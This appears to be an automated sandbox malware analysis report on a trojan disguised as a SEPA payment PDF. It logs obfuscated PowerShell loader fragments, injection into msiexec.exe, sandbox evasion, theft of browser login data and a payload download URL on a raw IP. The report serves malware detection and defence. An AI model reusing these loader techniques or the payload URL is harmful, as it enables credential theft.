    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msvbvm60.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vb6zz.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winsqlite3.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Pago SEPA.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: aqm.Core.pdb source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Targetore.pdb" source: powershell.exe, 00000002.00000002.2601004631.00000000084D6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: %]qm.Core.pdb<w> source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    Source: Yara match | File source: 00000002.00000002.2604236409.000000000BBDF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Kaukasierens $Massekultur $Prologklausulens), (Nonmetrical @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Paabdes = [AppDomain]::CurrentDomain.GetAssembli
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Superaltar)), $Arteriopressorluminas).DefineDynamicModule($Tjenende, $false).DefineType($Pacifies147, $stimevise, [System.MulticastDel
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0484CA78 push eax; mov dword ptr [esp], edx 2_2_0484CA8C

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: Possible double extension: pdf.exe | Static PE information: Pago SEPA.pdf.exe
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6561
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3198
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3008 | Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_00406362 FindFirstFileW,FindClose, 0_2_00406362
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405810
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
    Source: WebData.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
    Source: WebData.6.dr | Binary or memory string: discord.comVMware20,11696428655f
    Source: WebData.6.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
    Source: WebData.6.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
    Source: WebData.6.dr | Binary or memory string: global block list test formVMware20,11696428655
    Source: WebData.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C77000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: msiexec.exe, 00000006.00000003.2741999478.0000000006CA2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ctivebrokers.co.inVMware20,11696428655d
    Source: WebData.6.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
    Source: WebData.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
    Source: WebData.6.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
    Source: WebData.6.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
    Source: WebData.6.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: WebData.6.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
    Source: WebData.6.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
    Source: WebData.6.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
    Source: WebData.6.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
    Source: WebData.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
    Source: WebData.6.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
    Source: WebData.6.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
    Source: WebData.6.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
    Source: WebData.6.dr | Binary or memory string: AMC password management pageVMware20,11696428655
    Source: WebData.6.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
    Source: WebData.6.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
    Source: WebData.6.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
    Source: WebData.6.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
    Source: WebData.6.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
    Source: WebData.6.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
    Source: WebData.6.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
    Source: WebData.6.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
    Source: WebData.6.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
    Source: WebData.6.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
    Source: WebData.6.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | API call chain: ExitProcess graph end node graph_0-3302
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0479F288 LdrInitializeThunk,LdrInitializeThunk, 2_2_0479F288
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2C00000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exe | Code function: 0_2_00406041 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW

    Stealing of Sensitive Information

    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Tactic: techniques (the number in front of a technique is the count shown in the matrix cell)
    Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
    Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
    Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
    Execution: 1 Windows Management Instrumentation, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
    Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
    Privilege Escalation: 1 Access Token Manipulation, 311 Process Injection, 1 DLL Side-Loading, Login Hook, Network Logon Script, RC Scripts, Startup Items
    Defense Evasion: 11 Masquerading, 21 Virtualization/Sandbox Evasion, 1 Access Token Manipulation, 311 Process Injection, 11 Obfuscated Files or Information, 1 Software Packing, 1 DLL Side-Loading
    Credential Access: 1 OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
    Discovery: 1 Security Software Discovery, 1 Process Discovery, 21 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 1 System Network Configuration Discovery, 2 File and Directory Discovery, 14 System Information Discovery
    Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
    Collection: 1 Archive Collected Data, 1 Data from Local System, 1 Clipboard Data, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
    Command and Control: 1 Encrypted Channel, 1 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 12 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port
    Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
    Impact: 1 System Shutdown/Reboot, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
    Source | Detection | Scanner | Label
    Pago SEPA.pdf.exe | 47% | ReversingLabs | Win32.Trojan.Generic
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://showip.net/W | 0% | Avira URL Cloud | safe
    http://104.168.32.140/jUPSCuLd221.bin | 0% | Avira URL Cloud | safe
    https://go.microsoftB | 0% | Avira URL Cloud | safe
    http://showip.net/g | 0% | Avira URL Cloud | safe
    https://go.microsoftBranchCache.psd1as | 0% | Avira URL Cloud | safe
    http://showip.netll | 0% | Avira URL Cloud | safe
    http://www.microsoft.-h | 0% | Avira URL Cloud | safe
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    showip.net | 162.55.60.2 | true | false | - | high
    Name | Malicious | Antivirus Detection | Reputation
    http://104.168.32.140/jUPSCuLd221.bin | false | Avira URL Cloud: safe | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://duckduckgo.com/chrome_newtab | msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://duckduckgo.com/ac/?q= | msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1 | msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2588514134.0000000004E06000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://showip.net/ | msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2588514134.0000000004E06000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://contoso.com/License | powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://contoso.com/Icon | powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://unpkg.com/leaflet | msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    https://showip.net/?checkip= | msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    http://nsis.sf.net/NSIS_ErrorError | Pago SEPA.pdf.exe | false | - | high
    https://www.ecosia.org/newtab/ | msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    http://showip.net/ | msiexec.exe, 00000006.00000002.3345240394.0000000006CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345090343.0000000006C86000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2755040323.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2588514134.0000000004E06000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://showip.net | msiexec.exe, 00000006.00000002.3345090343.0000000006C5C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345090343.0000000006C86000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    https://go.microsoftBranchCache.psd1as | powershell.exe, 00000002.00000002.2597839099.0000000008380000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.microsoft.-h | powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://ac.ecosia.org/autocomplete?q= | msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    http://showip.netll | msiexec.exe, 00000006.00000002.3345090343.0000000006C5C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://schema.org | msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    http://crl.micro | powershell.exe, 00000002.00000002.2593527017.0000000007510000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.2588514134.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://showip.net/W | msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    https://www.openstreetmap.org/copyright | msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    https://contoso.com/ | powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://www.maxmind.com | msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    http://www.microsoft.c | powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2588514134.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://showip.net/g | msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    https://go.microsoftB | powershell.exe, 00000002.00000002.2597839099.0000000008380000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    104.168.32.140 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
    162.55.60.2 | showip.net | United States | 35893 | ACPCA | false
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1556579
                                                                    Start date and time:2024-11-15 17:19:06 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 6m 30s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of new started processes analysed:8
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Pago SEPA.pdf.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/13@1/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 33.3%
                                                                    HCA Information:
                                                                    • Successful, ratio: 95%
                                                                    • Number of executed functions: 99
                                                                    • Number of non-executed functions: 39
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
